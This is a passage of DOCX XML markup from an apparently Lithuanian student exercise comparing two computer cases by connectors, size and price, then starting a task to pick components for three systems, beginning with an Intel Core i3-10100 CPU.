                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="53C55DB1" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="621F1948" w14:textId="0D82CD5D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Priekinio skydelio jungtys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7AF2706C" w14:textId="3B4CD221" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Audio Out, Audio-in, USB 2.0, USB 3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63544ED4" w14:textId="2CA69011" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Audio Out, Audio-in, USB 3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="689929E5" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="66955E96" w14:textId="2C272F28" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Papildomai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="36E662D1" w14:textId="73274001" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Palaikoma ATX, mATX ir Mini-ITX. Komplekte: 1 x 120 mm ventiliatorius (gale). 1 x 120 mm ventiliatorius (priekyje)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05741202" w14:textId="0CF1B2CC" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Palaikoma</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3684C3AA" w14:textId="55650734" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>+ Mini-ITX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4E4690EA" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7028AB87" w14:textId="2CFC99FA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Matmenys ir svoris</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7FC74506" w14:textId="11F97824" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Plotis20,3 cm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F3A66C0" w14:textId="07A834F1" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gylis41.1 cm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4174029C" w14:textId="7C5873E1" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aukštis44.4 cm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="153DC365" w14:textId="79581CE2" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Plotis23 cm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA7F32E" w14:textId="7D4D9025" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gylis37.8 cm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67248C11" w14:textId="02F834B3" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aukštis38.7 cm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="564132E3" w:rsidRPr="005A5C28" w14:paraId="562107E2" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18C1FD6B" w14:textId="67275A5F" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Kaina </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0EBE6600" w14:textId="0D3D16C9" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>33,53 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="70490547" w14:textId="16C549C0" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>42,91 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5628C2BD" w14:textId="1A48E2EE" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F202207" w14:textId="2A4A6955" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Išvados.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mid tower (ATX) formos faktoriaus</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>korpusai yra didesni</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>negu Mini tower (Micro ATX).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1892FC9C" w14:textId="4136004A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atitinkamai didesniame korpus</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> telpa</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ATX formos faktoriaus pagrindinės plokštės ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>daugiau</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kitų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>komponentų</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. M</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ažesniame Mini tower (Micro ATX)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tilps</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tik Micro ATX formos faktoriaus pagrindinės plokštės</w:t>
      </w:r>
      <w:r w:rsidR="7EA23284" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Korpuso</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pranašumas yra geresnė oro cirkuliacija, vadinasi</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>komponentai mažiau kais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552616D6" w14:textId="3AF0CBEF" w:rsidR="006D4299" w:rsidRPr="005A5C28" w:rsidRDefault="006D4299" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E244867" w14:textId="77777777" w:rsidR="006D4299" w:rsidRPr="005A5C28" w:rsidRDefault="006D4299" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E7D031" w14:textId="05ABA71E" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>6 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARINKTI TINKAMUS KOMPIUTERIO KOMPONENTUS TR</w:t>
      </w:r>
      <w:r w:rsidR="3795935A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>EJOMS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> KOMPIUTERIO SISTEMOMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7590D" w14:textId="2D8A799D" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2838C607" w14:textId="022AB595" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pirmas variantas skirtas verslui (biurui) ir namų vartotojams.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2531"/>
        <w:gridCol w:w="4979"/>
        <w:gridCol w:w="944"/>
        <w:gridCol w:w="1457"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5A51F5EC" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1FC5362F" w14:textId="66834493" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prekės pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="67619929" w14:textId="21C03B97" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prekės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="20E15B60" w14:textId="1495E088" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1C7415FA" w14:textId="4FC59D4F" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kaina 1 vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="315BFFC8" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4ABA6D70" w14:textId="1F8D8CCB" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procesorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16EE2F27" w14:textId="1A6D46D0" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="01DD8CAD" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>INTEL Core i3-10100 3.6GHz LGA1200 6M Cache Boxed CPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
